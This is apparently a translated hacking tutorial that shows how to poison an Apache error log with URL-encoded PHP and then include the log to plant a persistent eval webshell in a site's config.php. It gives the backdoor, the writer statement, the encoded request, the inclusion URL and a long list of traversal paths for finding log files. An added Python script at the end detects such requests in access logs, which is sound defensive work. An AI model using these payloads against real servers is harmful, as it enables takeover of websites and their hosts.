Since the method above is not very practical (in my testing the logs were often tens of megabytes, which takes the fun out of it), let's go a step further: write a real, usable webshell, which is far better than the painfully slow approach above.

For example, take the same one-line backdoor again:

<?eval($_POST[cmd]);?>
At this point you may already see it: this is a pretty good approach. Read on, because how to write it in becomes the question. Use this statement:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php, then writes the one-line backdoor server-side statement <?eval($_POST[cmd]);?> into it. Expressed as a single PHP statement this is:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");fclose($fp);?> // writes the one-line backdoor into config.php

We submit this, have Apache record it in the error log, then include the log; that writes the shell. Remember: it must be converted to URL-encoded form, otherwise it will not work.
Converted:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the error log records the line of code that writes the webshell.
Now we include the log again; submit
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

With that the webshell is written successfully: the one-line backdoor is now in config.php.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect to it with lanker's client and the host is yours.

PS: Everything above assumes the directory permissions are writable; it has to be -rwxrwxrwx (777) to proceed, which you can check directly with the directories listed above. Everything above also assumes the log path is known.

For other log paths you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
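The two halves of the technique described above both leave a trace in the access log: the poisoning request carries URL-encoded PHP, and the inclusion request points an include parameter at one of the log paths listed. The following is an added example (not part of the original post) that URL-decodes the request target of each Apache access-log line and flags both signs; the log lines, IP addresses and the `z.php?zizzy=` parameter are constructed sample data, the latter borrowed from the post.

```python
"""Detect log-poisoning / log-inclusion attempts in Apache access logs.
Added example, not from the original post. It URL-decodes each request
target and flags PHP open tags (poisoning) and include parameters that
point at a log file (the LFI step). Log lines are constructed samples."""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /%3C%3F%24fp%3Dfopen%28%22config.php%22%2C%22w%2B%22%29%3B%3F%3E HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:44 +0000] "GET /z.php?zizzy=../../../../var/log/httpd/error_log HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /z.php?zizzy=about HTTP/1.1" 200 300 "-" "curl/7.88"
"""

REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.IGNORECASE)  # <? <?php <?=
# Traversal or an absolute path into one of the log directories listed
# above, ending in a log file name.
LOG_PATH_RE = re.compile(
    r"(\.\./|/var/log/|/var/www/logs/|/usr/local/apache/logs/"
    r"|/etc/httpd/logs/|/apache/logs/)[^&\s]*log\b", re.IGNORECASE)

def decode_target(target: str) -> str:
    """Apache stores the raw percent-encoded target; decode it before
    inspection, twice so double-encoded payloads are caught as well."""
    return unquote(unquote(target))

def classify(line: str) -> list:
    """Return the findings for one log line (empty list if benign)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded = decode_target(m.group("target"))
    findings = []
    if PHP_TAG_RE.search(decoded):
        findings.append("php-code-in-request")  # poisoning payload
    if LOG_PATH_RE.search(decoded):
        findings.append("log-file-include")     # LFI aimed at a log
    return findings

def scan(log_text: str) -> dict:
    """Map 1-based line number -> findings for every suspicious line."""
    results = {}
    for number, line in enumerate(log_text.splitlines(), start=1):
        if findings := classify(line):
            results[number] = findings
    return results

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG).items():
        print(f"line {number}: {', '.join(findings)}")
```

Because Apache writes the request target exactly as received, the decoding step is what makes the `%3C%3F` form visible; the same check can be run over the error log, where the rejected request also lands.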